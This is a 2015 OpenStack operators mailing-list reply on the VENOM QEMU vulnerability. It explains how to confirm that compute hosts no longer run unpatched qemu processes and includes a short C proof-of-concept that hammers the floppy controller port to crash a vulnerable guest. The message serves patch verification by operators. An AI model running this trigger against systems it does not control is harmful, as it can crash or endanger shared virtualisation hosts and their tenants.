[Openstack-operators] Venom vulnerability
Tristan Cacqueray
tdecacqu at redhat.com
Thu Jun 4 18:39:10 UTC 2015
On 06/04/2015 08:50 AM, Fox, Kevin M wrote:
> I'm not aware of any check that actually tests the vulnerability. Just checks package versions.
Hi,
On the compute host you can check the process age using "ps aux". The
START column for every qemu-system-* process should be more recent than
the date you updated. At least, any process older than May 13th still
has the bug.
Also, using PID, you can make sure /proc/$pid/exe is pointing to the new
binary and not a "(deleted)" one.
Within a guest, the condition of exploitation may vary from system to
system. A reproducer has been published here:
http://seclists.org/oss-sec/2015/q2/448
Though it requires fast timing, here is an updated version to prod the
other vulnerable floppy command:
cat>venom.c<<EOF
#include <sys/io.h>
int main() {
int i;
iopl(3);
for (i=0;i<10000000;i++)
outsb(0x3f5,"\x8e\x00\x00\x00\x00\x00",6);
}
EOF
gcc -O2 venom.c && sudo ./a.out
This should crash an ubuntu-14.04 instance if qemu is still vulnerable.
However it's not 100% guaranteed and you better make sure qemu-kvm is
up-to-date and no old qemu instance are running.
Regards,
Tristan
-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 473 bytes
Desc: OpenPGP digital signature
URL: <http://lists.openstack.org/pipermail/openstack-operators/attachments/20150604/b58b8cf6/attachment.pgp>
More information about the OpenStack-operators
mailing list